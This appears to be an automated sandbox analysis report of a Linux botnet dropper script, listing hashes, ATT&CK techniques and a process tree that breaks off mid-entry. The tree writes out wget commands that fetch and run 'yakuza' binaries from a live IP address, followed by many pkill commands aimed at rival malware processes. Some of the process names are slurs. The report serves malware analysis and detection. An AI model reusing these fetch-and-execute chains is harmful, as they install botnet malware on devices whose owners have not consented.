37b2c36f599fd5ba676cce6512abe7aa47c08605aacf3fa31b536054d6e067f7

Analysis

max time kernel
148s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
17-11-2024 09:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

l.sh
Size

1KB
MD5

b5a7f5f630bc2eee5f8a30ecc75b3e9c
SHA1

adc6352bb1ca055207d877c1fb3c7486adc0be20
SHA256

37b2c36f599fd5ba676cce6512abe7aa47c08605aacf3fa31b536054d6e067f7
SHA512

ad8c3562b969fa3f6ae958cde6202dace4fbabbf8da1d5c57e89cb707b77fd2e76154df4a5d4a719eb931763fa70de9d224b4c29f93320db5251c5acfc5ff679

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1524	chmod
1554	chmod
1593	chmod
1529	chmod
1534	chmod
1539	chmod
1549	chmod
1567	chmod
1572	chmod
1588	chmod
1607	chmod
1612	chmod
1626	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/yakuza.mips	1525	yakuza.mips

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1358/cmdline	pkill
File opened for reading	/proc/1391/cmdline	pkill
File opened for reading	/proc/202/status	pkill
File opened for reading	/proc/1209/status	Process not Found
File opened for reading	/proc/19/status	pkill
File opened for reading	/proc/1310/status	Process not Found
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/1164/status	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/1078/status	pkill
File opened for reading	/proc/115/status	pkill
File opened for reading	/proc/965/status	pkill
File opened for reading	/proc/31/status	Process not Found
File opened for reading	/proc/1347/status	pkill
File opened for reading	/proc/35/status	pkill
File opened for reading	/proc/974/cmdline	pkill
File opened for reading	/proc/2/cmdline	pkill
File opened for reading	/proc/1051/status	pkill
File opened for reading	/proc/503/cmdline	pkill
File opened for reading	/proc/488/status	pkill
File opened for reading	/proc/656/cmdline	pkill
File opened for reading	/proc/706/status	pkill
File opened for reading	/proc/499/status	pkill
File opened for reading	/proc/1880/cmdline	pkill
File opened for reading	/proc/28/status	pkill
File opened for reading	/proc/29/cmdline	pkill
File opened for reading	/proc/1081/cmdline	Process not Found
File opened for reading	/proc/1391/status	Process not Found
File opened for reading	/proc/16/status	pkill
File opened for reading	/proc/1098/cmdline	pkill
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/78/cmdline	pkill
File opened for reading	/proc/78/status	pkill
File opened for reading	/proc/547/status	pkill
File opened for reading	/proc/1160/cmdline	Process not Found
File opened for reading	/proc/82/status	Process not Found
File opened for reading	/proc/547/status	pkill
File opened for reading	/proc/169/cmdline	pkill
File opened for reading	/proc/1088/status	pkill
File opened for reading	/proc/168/status	Process not Found
File opened for reading	/proc/460/cmdline	pkill
File opened for reading	/proc/1111/status	pkill
File opened for reading	/proc/1310/cmdline	Process not Found
File opened for reading	/proc/1310/status	Process not Found
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/1088/status	pkill
File opened for reading	/proc/115/status	pkill
File opened for reading	/proc/32/status	Process not Found
File opened for reading	/proc/163/status	Process not Found
File opened for reading	/proc/201/status	pkill
File opened for reading	/proc/160/cmdline	pkill
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/1074/status	pkill
File opened for reading	/proc/326/cmdline	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/89/status	Process not Found
File opened for reading	/proc/1264/status	pkill
File opened for reading	/proc/1197/cmdline	pkill
File opened for reading	/proc/2388/status	pkill
File opened for reading	/proc/1143/status	Process not Found
File opened for reading	/proc/1340/cmdline	pkill
File opened for reading	/proc/14/cmdline	pkill

System Network Configuration Discovery 1 TTPs 15 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1530	yakuza.mipsel
2253	sh
2262	sh
1527	rm
1532	rm
2274	pkill
2277	busybox
2263	pkill
1520	wget
1528	wget
2258	pkill
2259	busybox
1525	yakuza.mips
2270	busybox
2271	sh

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/yakuza.mipsel	wget
File opened for modification	/tmp/yakuza.arm6	wget
File opened for modification	/tmp/yakuza.i686	wget
File opened for modification	/tmp/yakuza.i586	wget
File opened for modification	/tmp/yakuza.arm4	wget
File opened for modification	/tmp/yakuza.mips	wget
File opened for modification	/tmp/yakuza.x86	wget
File opened for modification	/tmp/yakuza.ppc	wget
File opened for modification	/tmp/yakuza.m68k	wget
File opened for modification	/tmp/yakuza.arm5	wget
File opened for modification	/tmp/yakuza.arm7	wget
File opened for modification	/tmp/yakuza.sparc	wget
File opened for modification	/tmp/yakuza.sh	wget

/tmp/l.sh
/tmp/l.sh
1⤵
PID:1519
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1520
- /bin/chmod
  chmod +x yakuza.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/yakuza.mips
  ./yakuza.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1525
- /bin/rm
  rm -rf yakuza.mips
  2⤵
  - System Network Configuration Discovery
  PID:1527
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1528
- /bin/chmod
  chmod +x yakuza.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/yakuza.mipsel
  ./yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1530
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1532
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.sh
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:1535
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:1537
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.x86
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:1540
- - /bin/sh
    sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
    3⤵
    PID:1545
  - - /usr/bin/pkill
      pkill -9 902i13
      4⤵
      PID:1546
  - - /bin/busybox
      busybox pkill -9 902i13
      4⤵
      PID:1548
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:1564
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      PID:1565
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:1566
- - /bin/sh
    sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
    3⤵
    PID:1585
  - - /usr/bin/pkill
      pkill -9 HOHO-LUGO7
      4⤵
      PID:1586
  - - /bin/busybox
      busybox pkill -9 HOHO-LUGO7
      4⤵
      PID:1587
- - /bin/sh
    sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
    3⤵
    PID:1604
  - - /usr/bin/pkill
      pkill -9 HOHO-U79OL
      4⤵
      PID:1605
  - - /bin/busybox
      busybox pkill -9 HOHO-U79OL
      4⤵
      PID:1606
- - /bin/sh
    sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
    3⤵
    PID:1623
  - - /usr/bin/pkill
      pkill -9 JuYfouyf87
      4⤵
      PID:1624
  - - /bin/busybox
      busybox pkill -9 JuYfouyf87
      4⤵
      PID:1625
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:1636
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      Reads CPU attributes
      PID:1637
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:1638
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:1645
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      PID:1646
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:1647
- - /bin/sh
    sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
    3⤵
    PID:1654
  - - /usr/bin/pkill
      pkill -9 LOLKIKEEEDDE
      4⤵
      Reads CPU attributes
      PID:1655
  - - /bin/busybox
      busybox pkill -9 LOLKIKEEEDDE
      4⤵
      PID:1656
- - /bin/sh
    sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
    3⤵
    PID:1663
  - - /usr/bin/pkill
      pkill -9 ekjheory98e
      4⤵
      PID:1664
  - - /bin/busybox
      busybox pkill -9 ekjheory98e
      4⤵
      PID:1665
- - /bin/sh
    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
    3⤵
    PID:1672
  - - /usr/bin/pkill
      pkill -9 scansh4
      4⤵
      PID:1673
  - - /bin/busybox
      busybox pkill -9 scansh4
      4⤵
      PID:1674
- - /bin/sh
    sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
    3⤵
    PID:1681
  - - /usr/bin/pkill
      pkill -9 MDMA
      4⤵
      PID:1682
  - - /bin/busybox
      busybox pkill -9 MDMA
      4⤵
      PID:1683
- - /bin/sh
    sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
    3⤵
    PID:1690
  - - /usr/bin/pkill
      pkill -9 fdevalvex
      4⤵
      PID:1691
  - - /bin/busybox
      busybox pkill -9 fdevalvex
      4⤵
      PID:1692
- - /bin/sh
    sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
    3⤵
    PID:1699
  - - /usr/bin/pkill
      pkill -9 scanspc
      4⤵
      PID:1700
  - - /bin/busybox
      busybox pkill -9 scanspc
      4⤵
      PID:1701
- - /bin/sh
    sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
    3⤵
    PID:1708
  - - /usr/bin/pkill
      pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:1709
  - - /bin/busybox
      busybox pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:1710
- - /bin/sh
    sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
    3⤵
    PID:1717
  - - /usr/bin/pkill
      pkill -9 flexsonskids
      4⤵
      PID:1718
  - - /bin/busybox
      busybox pkill -9 flexsonskids
      4⤵
      PID:1719
- - /bin/sh
    sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
    3⤵
    PID:1724
  - - /usr/bin/pkill
      pkill -9 scanx86
      4⤵
      PID:1725
  - - /bin/busybox
      busybox pkill -9 scanx86
      4⤵
      PID:1728
- - /bin/sh
    sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
    3⤵
    PID:1733
  - - /usr/bin/pkill
      pkill -9 MISAKI-U79OL
      4⤵
      PID:1734
  - - /bin/busybox
      busybox pkill -9 MISAKI-U79OL
      4⤵
      PID:1737
- - /bin/sh
    sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
    3⤵
    PID:1742
  - - /usr/bin/pkill
      pkill -9 foAxi102kxe
      4⤵
      Reads CPU attributes
      PID:1743
  - - /bin/busybox
      busybox pkill -9 foAxi102kxe
      4⤵
      PID:1746
- - /bin/sh
    sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
    3⤵
    PID:1751
  - - /usr/bin/pkill
      pkill -9 swodjwodjwoj
      4⤵
      PID:1752
  - - /bin/busybox
      busybox pkill -9 swodjwodjwoj
      4⤵
      PID:1755
- - /bin/sh
    sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
    3⤵
    PID:1760
  - - /usr/bin/pkill
      pkill -9 MmKiy7f87l
      4⤵
      PID:1761
  - - /bin/busybox
      busybox pkill -9 MmKiy7f87l
      4⤵
      PID:1764
- - /bin/sh
    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
    3⤵
    PID:1769
  - - /usr/bin/pkill
      pkill -9 freecookiex86
      4⤵
      PID:1770
  - - /bin/busybox
      busybox pkill -9 freecookiex86
      4⤵
      PID:1773
- - /bin/sh
    sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
    3⤵
    PID:1776
  - - /usr/bin/pkill
      pkill -9 sysgpu
      4⤵
      Reads CPU attributes
      PID:1779
  - - /bin/busybox
      busybox pkill -9 sysgpu
      4⤵
      PID:1782
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:1785
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      PID:1788
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:1789
- - /bin/sh
    sh -c "pkill -9 frgege || busybox pkill -9 frgege"
    3⤵
    PID:1793
  - - /usr/bin/pkill
      pkill -9 frgege
      4⤵
      PID:1795
  - - /bin/busybox
      busybox pkill -9 frgege
      4⤵
      PID:1798
- - /bin/sh
    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
    3⤵
    PID:1802
  - - /usr/bin/pkill
      pkill -9 sysupdater
      4⤵
      PID:1804
  - - /bin/busybox
      busybox pkill -9 sysupdater
      4⤵
      PID:1809
- - /bin/sh
    sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
    3⤵
    PID:1813
  - - /usr/bin/pkill
      pkill -9 0DnAzepd
      4⤵
      Reads CPU attributes
      PID:1815
  - - /bin/busybox
      busybox pkill -9 0DnAzepd
      4⤵
      PID:1816
- - /bin/sh
    sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
    3⤵
    PID:1820
  - - /usr/bin/pkill
      pkill -9 NiGGeRD0nks69
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1821
  - - /bin/busybox
      busybox pkill -9 NiGGeRD0nks69
      4⤵
      PID:1826
- - /bin/sh
    sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
    3⤵
    PID:1828
  - - /usr/bin/pkill
      pkill -9 frgreu
      4⤵
      Reads runtime system information
      PID:1832
  - - /bin/busybox
      busybox pkill -9 frgreu
      4⤵
      PID:1834
- - /bin/sh
    sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
    3⤵
    PID:1840
  - - /usr/bin/pkill
      pkill -9 telnetd
      4⤵
      PID:1841
  - - /bin/busybox
      busybox pkill -9 telnetd
      4⤵
      PID:1845
- - /bin/sh
    sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
    3⤵
    PID:1849
  - - /usr/bin/pkill
      pkill -9 0x766f6964
      4⤵
      PID:1853
  - - /bin/busybox
      busybox pkill -9 0x766f6964
      4⤵
      PID:1856
- - /bin/sh
    sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
    3⤵
    PID:1861
  - - /usr/bin/pkill
      pkill -9 NiGGeRd0nks1337
      4⤵
      PID:1862
  - - /bin/busybox
      busybox pkill -9 NiGGeRd0nks1337
      4⤵
      PID:1864
- - /bin/sh
    sh -c "pkill -9 gaft || busybox pkill -9 gaft"
    3⤵
    PID:1866
  - - /usr/bin/pkill
      pkill -9 gaft
      4⤵
      PID:1869
  - - /bin/busybox
      busybox pkill -9 gaft
      4⤵
      PID:1874
- - /bin/sh
    sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
    3⤵
    PID:1877
  - - /usr/bin/pkill
      pkill -9 urasgbsigboa
      4⤵
      Reads runtime system information
      PID:1880
  - - /bin/busybox
      busybox pkill -9 urasgbsigboa
      4⤵
      PID:1881
- - /bin/sh
    sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
    3⤵
    PID:1886
  - - /usr/bin/pkill
      pkill -9 120i3UI49
      4⤵
      PID:1887
  - - /bin/busybox
      busybox pkill -9 120i3UI49
      4⤵
      PID:1890
- - /bin/sh
    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
    3⤵
    PID:1893
  - - /usr/bin/pkill
      pkill -9 OaF3
      4⤵
      PID:1897
  - - /bin/busybox
      busybox pkill -9 OaF3
      4⤵
      PID:1900
- - /bin/sh
    sh -c "pkill -9 geae || busybox pkill -9 geae"
    3⤵
    PID:1904
  - - /usr/bin/pkill
      pkill -9 geae
      4⤵
      Reads CPU attributes
      PID:1905
  - - /bin/busybox
      busybox pkill -9 geae
      4⤵
      PID:1908
- - /bin/sh
    sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
    3⤵
    PID:1911
  - - /usr/bin/pkill
      pkill -9 vaiolmao
      4⤵
      PID:1914
  - - /bin/busybox
      busybox pkill -9 vaiolmao
      4⤵
      PID:1919
- - /bin/sh
    sh -c "pkill -9 123123a || busybox pkill -9 123123a"
    3⤵
    PID:1920
  - - /usr/bin/pkill
      pkill -9 123123a
      4⤵
      PID:1923
  - - /bin/busybox
      busybox pkill -9 123123a
      4⤵
      PID:1928
- - /bin/sh
    sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
    3⤵
    PID:1931
  - - /usr/bin/pkill
      pkill -9 Ofurain0n4H34D
      4⤵
      Reads CPU attributes
      PID:1934
  - - /bin/busybox
      busybox pkill -9 Ofurain0n4H34D
      4⤵
      PID:1937
- - /bin/sh
    sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
    3⤵
    PID:1940
  - - /usr/bin/pkill
      pkill -9 ggTrex
      4⤵
      PID:1942
  - - /bin/busybox
      busybox pkill -9 ggTrex
      4⤵
      PID:1944
- - /bin/sh
    sh -c "pkill -9 wasads || busybox pkill -9 wasads"
    3⤵
    PID:1947
  - - /usr/bin/pkill
      pkill -9 wasads
      4⤵
      PID:1950
  - - /bin/busybox
      busybox pkill -9 wasads
      4⤵
      PID:1953
- - /bin/sh
    sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
    3⤵
    PID:1956
  - - /usr/bin/pkill
      pkill -9 1293194hjXD
      4⤵
      PID:1960
  - - /bin/busybox
      busybox pkill -9 1293194hjXD
      4⤵
      PID:1964
- - /bin/sh
    sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
    3⤵
    PID:1969
  - - /usr/bin/pkill
      pkill -9 OthLaLosn
      4⤵
      PID:1970
  - - /bin/busybox
      busybox pkill -9 OthLaLosn
      4⤵
      PID:1973
- - /bin/sh
    sh -c "pkill -9 ggt || busybox pkill -9 ggt"
    3⤵
    PID:1977
  - - /usr/bin/pkill
      pkill -9 ggt
      4⤵
      Reads CPU attributes
      PID:1979
  - - /bin/busybox
      busybox pkill -9 ggt
      4⤵
      PID:1981
- - /bin/sh
    sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
    3⤵
    PID:1984
  - - /usr/bin/pkill
      pkill -9 wget-log
      4⤵
      PID:1987
  - - /bin/busybox
      busybox pkill -9 wget-log
      4⤵
      PID:1990
- - /bin/sh
    sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
    3⤵
    PID:1992
  - - /usr/bin/pkill
      pkill -9 1337SoraLOADER
      4⤵
      PID:1995
  - - /bin/busybox
      busybox pkill -9 1337SoraLOADER
      4⤵
      PID:2000
- - /bin/sh
    sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
    3⤵
    PID:2003
  - - /usr/bin/pkill
      pkill -9 SAIAKINA
      4⤵
      PID:2006
  - - /bin/busybox
      busybox pkill -9 SAIAKINA
      4⤵
      PID:2009
- - /bin/sh
    sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
    3⤵
    PID:2012
  - - /usr/bin/pkill
      pkill -9 ggtq
      4⤵
      PID:2015
  - - /bin/busybox
      busybox pkill -9 ggtq
      4⤵
      PID:2017
- - /bin/sh
    sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
    3⤵
    PID:2023
  - - /usr/bin/pkill
      pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:2024
  - - /bin/busybox
      busybox pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:2027
- - /bin/sh
    sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
    3⤵
    PID:2030
  - - /usr/bin/pkill
      pkill -9 SAIAKUSO
      4⤵
      PID:2032
  - - /bin/busybox
      busybox pkill -9 SAIAKUSO
      4⤵
      PID:2034
- - /bin/sh
    sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
    3⤵
    PID:2038
  - - /usr/bin/pkill
      pkill -9 ggtr
      4⤵
      PID:2040
  - - /bin/busybox
      busybox pkill -9 ggtr
      4⤵
      PID:2044
- - /bin/sh
    sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
    3⤵
    PID:2046
  - - /usr/bin/pkill
      pkill -9 14Fa
      4⤵
      PID:2047
  - - /bin/busybox
      busybox pkill -9 14Fa
      4⤵
      PID:2052
- - /bin/sh
    sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
    3⤵
    PID:2057
  - - /usr/bin/pkill
      pkill -9 SEXSLAVE1337
      4⤵
      PID:2060
  - - /bin/busybox
      busybox pkill -9 SEXSLAVE1337
      4⤵
      PID:2062
- - /bin/sh
    sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
    3⤵
    PID:2066
  - - /usr/bin/pkill
      pkill -9 ggtt
      4⤵
      Reads runtime system information
      PID:2069
  - - /bin/busybox
      busybox pkill -9 ggtt
      4⤵
      PID:2070
- - /bin/sh
    sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
    3⤵
    PID:2074
  - - /usr/bin/pkill
      pkill -9 1902a3u912u3u4
      4⤵
      PID:2077
  - - /bin/busybox
      busybox pkill -9 1902a3u912u3u4
      4⤵
      PID:2081
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:2086
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads CPU attributes
      PID:2087
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:2088
- - /bin/sh
    sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
    3⤵
    PID:2095
  - - /usr/bin/pkill
      pkill -9 haetrghbr
      4⤵
      PID:2096
  - - /bin/busybox
      busybox pkill -9 haetrghbr
      4⤵
      PID:2099
- - /bin/sh
    sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
    3⤵
    PID:2104
  - - /usr/bin/pkill
      pkill -9 19ju3d
      4⤵
      PID:2105
  - - /bin/busybox
      busybox pkill -9 19ju3d
      4⤵
      PID:2108
- - /bin/sh
    sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
    3⤵
    PID:2111
  - - /usr/bin/pkill
      pkill -9 SORAojkf120
      4⤵
      PID:2114
  - - /bin/busybox
      busybox pkill -9 SORAojkf120
      4⤵
      PID:2116
- - /bin/sh
    sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
    3⤵
    PID:2118
  - - /usr/bin/pkill
      pkill -9 hehahejeje92
      4⤵
      PID:2121
  - - /bin/busybox
      busybox pkill -9 hehahejeje92
      4⤵
      PID:2126
- - /bin/sh
    sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
    3⤵
    PID:2129
  - - /usr/bin/pkill
      pkill -9 2U2JDJA901F91
      4⤵
      Reads runtime system information
      PID:2131
  - - /bin/busybox
      busybox pkill -9 2U2JDJA901F91
      4⤵
      PID:2135
- - /bin/sh
    sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
    3⤵
    PID:2138
  - - /usr/bin/pkill
      pkill -9 SlaVLav12
      4⤵
      PID:2141
  - - /bin/busybox
      busybox pkill -9 SlaVLav12
      4⤵
      PID:2144
- - /bin/sh
    sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
    3⤵
    PID:2145
  - - /usr/bin/pkill
      pkill -9 helpmedaddthhhhh
      4⤵
      Reads runtime system information
      PID:2148
  - - /bin/busybox
      busybox pkill -9 helpmedaddthhhhh
      4⤵
      PID:2152
- - /bin/sh
    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
    3⤵
    PID:2156
  - - /usr/bin/pkill
      pkill -9 2wgg9qphbq
      4⤵
      PID:2159
  - - /bin/busybox
      busybox pkill -9 2wgg9qphbq
      4⤵
      PID:2160
- - /bin/sh
    sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
    3⤵
    PID:2165
  - - /usr/bin/pkill
      pkill -9 Slav3Th3seD3vices
      4⤵
      PID:2168
  - - /bin/busybox
      busybox pkill -9 Slav3Th3seD3vices
      4⤵
      PID:2169
- - /bin/sh
    sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
    3⤵
    PID:2172
  - - /usr/bin/pkill
      pkill -9 hzSmYZjYMQ
      4⤵
      PID:2175
  - - /bin/busybox
      busybox pkill -9 hzSmYZjYMQ
      4⤵
      PID:2178
- - /bin/sh
    sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
    3⤵
    PID:2181
  - - /usr/bin/pkill
